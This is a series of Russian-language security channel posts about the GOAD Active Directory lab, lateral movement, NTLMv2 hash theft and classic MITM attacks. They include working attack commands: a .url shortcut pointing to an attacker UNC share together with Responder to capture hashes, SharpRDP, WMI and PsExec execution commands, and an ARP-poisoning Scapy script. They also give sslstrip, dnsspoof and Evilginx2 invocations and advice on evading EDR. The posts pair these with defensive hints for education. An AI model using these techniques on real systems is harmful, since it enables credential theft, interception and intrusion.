GOAD — один из лучших учебных стендов для Active Directory-атак и защиты
А вы слышали про GOAD?
Кажется, только ленивый не знает про этот ультимативный проект.

Сегодня поговорим о проекте, который должен быть в арсенале каждого, кто работает с Active Directory, будь то красная команда, синие защитники, или просто специалист, стремящийся выйти за рамки теории.

GOAD (GitHub: Orange-Cyberdefense/GOAD) — это реалистичная лаборатория на базе AD, которую можно развернуть в локальной среде с помощью Docker и Ansible.
Ссылка: 👉 ТЫК

Что такое GOAD? 🧘‍♀️
Это автоматически разворачиваемая инфраструктура, имитирующая корпоративную AD-сеть, включающая:

Доменный контроллер
Пользователей с реалистичными правами
Уязвимости, типичные для продакшн-сред
Службы вроде SQL Server, IIS и файловых шар

Проект разрабатывался с фокусом на реализм и практическую пользу для Red и Blue команд.

Чем полезен GOAD для красной команды? 🧛
Если вы пентестер или red team-инженер, GOAD даёт:
Полноценную AD-среду для отработки техник.

Enumeration
Lateral movement
Privilege escalation
Persistence
DC shadow, DCSync и Kerberoasting — без риска для продакшна

Возможность тестировать инструменты: BloodHound, Mimikatz, Rubeus, Impacket, SharpHound и другие.
Готовые сценарии для симуляции реальных атак, которые можно воспроизводить, анализировать и адаптировать под задачи клиента.

Чем полезен GOAD для синих? 😑
Если вы защищаете инфраструктуру, GOAD — это:

Анализ следов атак в логах (event logs, Sysmon)
Работа с SIEM-решениями (можно интегрировать Graylog, Splunk)
Настройка detection rules и EDR-алгоритмов
Реагирование на инциденты и построение процессов IR

Можно разворачивать атаки и тут же разбирать их по следам: что увидел лог, что пропустила защита, где сработал алерт.

Почему GOAD стоит изучать каждому? 🎓
GOAD делает акцент на практику, позволяя работать в условиях, максимально приближенных к боевым, а не просто изучать теорию на слайдах. Он не требует облака или сложной инфраструктуры — всё можно развернуть на локальной машине или сервере за короткое время. Благодаря открытому коду, GOAD легко адаптировать под свои задачи: добавить новые уязвимости, сервисы или имитировать конкретную корпоративную среду. Это делает его отличным инструментом как для самостоятельного изучения, так и для подготовки к сертификациям вроде OSCP, CRTO или PNPT.

Заключение
GOAD — это не просто лаборатория, это учебный полигон, который должен быть у каждого, кто работает с инфраструктурной безопасностью.

Кроме готовой инфраструктуры “из коробки”, одной из сильнейших сторон GOAD является открытость к кастомизации. Проект построен на базе Vagrant и Terraform, что значительно упрощает управление виртуальной средой и её масштабирование. Благодаря этому можно легко модифицировать топологию сети, добавлять собственные машины, образы и даже архаичные ОС — например, Windows XP, если вы хотите протестировать устаревшие протоколы или уязвимости.

Подписывайтесь на канал, дальше больше

Проходная статья получилась 😢
Слишком много работы, там еще и аэрофлот поломали, жесть одним словом.

Блутимщик вообще дуреет 🙂
Надеемся, это скоро закончится и станет проще. Пока есть пара козырных статей в рукаве, но всему свое время 🤯

Горизонтальное перемещение: тонкости, которые не пишут в мануалах

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Прежде чем говорить про утилиты горизонтального перемещения важно понимать зачем ты это делаешь, для какой задачи и просил ли тебя об этом клиент.

Моментик 🙂
В горизонтальном перемещении (lateral movement) важна не только техника, но и контекст. Часто в разговорах об этом этапе атаки всё сводится к заезженным методам — WMI, PSExec, RDP. Но настоящая игра начинается тогда, когда тебе нужно пройти не просто «на соседний сервер», а незаметно встроиться в рабочий ритм инфраструктуры, не оставляя триггеров на EDR и не ломая модель поведения пользователя.

Повышаем внимание, усыпляем бдительность 😑
Профессиональное перемещение не выглядит как атака. Оно — как привычное движение живого администратора: логины с тех же IP, те же команды, та же консоль. Основная ошибка новичков — торопливость и шумность. Использование любого инструмента, даже штатного, без понимания контекста — это гарантия выстрела себе в ногу.

Не инструменты, а идентичность 🦸‍♂️
К примеру, PsExec и WMIC замечательно работают… пока не включены базовые алерты на их использование. Но то, что действительно мало кто отслеживает — это сценарии входа в службы, нежные касания WinRM, тихий SMB сессии, зеркалирование сессионных токенов через доступный LSASS-дамп. Важно не только куда ты идёшь, но кем ты это делаешь. Перемещение токенов пользователя, сессионных cookies, либо же кража Kerberos-токенов — гораздо тише, чем любое повторное логинирование.

Аномалия — главный враг 😕
Внутри AD-окружения ключом является «встроенность в паттерн». Например, если ты получил токен пользователя, который редко логинится на определённые хосты "EventViewer в помощь", лучше не лезь туда — с высокой вероятностью это будет аномалия. Лучше найти его «привычные» хосты — может, это терминальный сервер или сервер учётной системы.

Умом 🤝
Теперь о действительно тонком моменте, который редко обсуждают: человеческий фактор логирования. Многие организации логируют не то, что важно, а то, что «настраивали по гайду», как правило даже используя стороннее решение, без системы MSSP, правила в инфре будут коробочными. Можно пройтись по сетке через SMB и WMI сотни раз, но если ты не вызываешь визуальных артефактов (например, pop-up на экране, странных окон или ошибок), шанс быть замеченным человеком минимален. То есть важна не только «техническая» тишина, но и «визуальная».

Хинт для красной команды: живи как пользователь

Не прыгайте сразу. Потратьте 10 минут на изучение поведения пользователя. Если у него активна Outlook-сессия, откройте те же вкладки. Притворяйтесь им в точке назначения. Даже имена временных файлов могут выдать фальшь, если система работает с шаблонами и запоминает их.

Хинт для синей команды: Бой с тенью или игра с самим собой

Не ловите «инструменты» — ловите нарушения модели поведения. Самое сложно это понять паттерн пользователя: куда, когда, с каких машин, с какой частотой. Любое отклонение — не обязательно зло, но точно повод посмотреть внимательнее.
Тут поможет исключительно внимательность и ваш уровень недоверия пользователю.

P.S.
Про картинку даже не спрашивайте, ИИ так видит горизонтальное перемещение по инфраструктуре.

Подписывайтесь на канал, дальше больше!

Горизонтальное перемещение: тени в инфраструктуре

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты.

Тихий проход через Headless RDP 😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:

SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.

WMI с MSI: установка, которая не то, чем кажется 🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:

Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.

PsExec: громкий, но надежный 🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:

PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.

GoExec: современный шпион 👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:

goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.

Как итог 🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.

Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.

Каждый кто увидит - окаменеет отдаст свой пароль

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей

1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы 🙈

[InternetShortcut] 
URL=RedBlue 
WorkingDirectory=notes 
IconFile=\\172.16.71.71\%USERNAME%.icon 
IconIndex=1

2. Запускаем responder, что бы принимать хэши

sudo responder -I eth0

3. Подкидываем жертве файл и рыбачим 🎣 Ждём, когда кто-то откроет папку с нашим файлом

4. БИНГО! Хэш у нас 💃 Дальше можно брутить, но это уже другая история

Хинт для красных👽:

Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещаться

Хинт для синих👽:

Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt 🤣

Подписывайтесь на канал, дальше больше!

Ого, 4-ый выпуск так быстро! Спасибо, что вы нас слушаете, мотивируете!
Сегодня промежуточный выпуск: захотели поговорить про IoT и другие «умные штуки». Как они влияют на нашу жизнь, чем могут реально напугать и почему иногда тостер или зубная щётка звучат страшнее, чем хакер с ноутбуком. Потравили пару баек, ну и как обычно рассказали лучшие способы решения проблем!

Кроме того, нас просят, чтобы подкаст выходил на Яндекс.Музыке, но при всём уважении к подписчикам и неуважении к компании на последнюю букву алфавита, на этой площадке мы не будем появляться. На то есть причины (когда-нибудь о них расскажет один из авторов, но не сейчас — интрига???).
Мы подумаем, где ещё можно будет залиститься.
А ещё мы экспериментируем со звуком и ищем лучшее звучание — так что каждая новая запись для нас тоже немного тест.

Кстати, мы теперь:

🟢Spotify
🟣Apple Music
🔴YouTube
🔵Web
🟡Index

Так что слушать стало ещё удобнее.

Если нравится то, что мы делаем — ставьте лайки и подписывайтесь, так вы помогаете подкасту расти.

MITM олдскул из нулевых?!

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Man-in-the-Middle (MITM) атаки из заумной теории превратились в доступный для любого энтузиаста инструмент. Это был настоящий «дикий запад» сетевой безопасности, где арсенал хакера часто ограничивался лишь знанием протоколов и парой скриптов в Kali Linux. Давайте посмотрим к чему пришли хакеры и что стало популярным в их арсенале.


АРП-призрак 🔫
Один из самых популярных способов MITM-атаки в локальных сетях. Злоумышленник отправляет ложные ARP-ответы, заставляя устройства в сети связываться с ним вместо настоящего шлюза. Это позволяет перехватывать и изменять трафик между устройствами.
Инструменты: arpspoof (Kali Linux), Scapy (Python)
Пример: Использование Scapy для создания ARP-спуфинга:

  from scapy.all import *
  
  def arp_poison(target_ip, gateway_ip):
      target_mac = getmacbyip(target_ip)
      gateway_mac = getmacbyip(gateway_ip)
      arp_target = ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac)
      arp_gateway = ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac)
      send(arp_target)
      send(arp_gateway)

Лишаем трафик защиты одним движением руки 🧘‍♀️
Атака, при которой злоумышленник перехватывает HTTPS-соединение и перенаправляет его на HTTP, удаляя SSL/TLS-шифрование. Это позволяет читать и изменять передаваемые данные.
Инструменты: sslstrip, mitmproxy
Пример: Запуск sslstrip с использованием iptables для перенаправления трафика:

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
  sslstrip -l 10000

Подменяем дорожные знаки 💃
Атака, при которой злоумышленник подменяет записи DNS-сервера, перенаправляя трафик на фальшивые сайты. Это может привести к фишинговым атакам или распространению вредоносного ПО.
Инструменты: dnsspoof (Kali Linux), mitmproxy
Пример: Использование dnsspoof для подмены DNS-записей:

 dnsspoof -i eth0 -f hosts.txt

Цифровой троянский конь 👀
Атака, при которой вредоносное ПО в браузере изменяет содержимое веб-страниц или перехватывает вводимые данные, такие как логины и пароли.
Инструменты: BeEF (Browser Exploitation Framework), Evilginx2
Пример: Использование Evilginx2 для фишинга с перехватом сессий:

  evilginx2 -p phishlets/office365

Заключение 🍩
Как видите, олдскульные MITM-атаки из нулевых, несмотря на свой возраст, блестяще демонстрируют фундаментальные уязвимости в самих принципах работы сетей. Эти техники не канули в Лету — они эволюционировали, стали частью сложных многоуровневых атак и инструментария пентестеров. Знание этой классики — не призыв к анархии, а лучший способ понять логику защиты. Современные методы вроде строгого HTTPS (HSTS), DNSSEC, аппаратной аутентификации ARP и защиты на уровне браузера рождены именно как ответ на эти простые, но гениальные атаки.

Подписывайтесь на канал, дальше больше!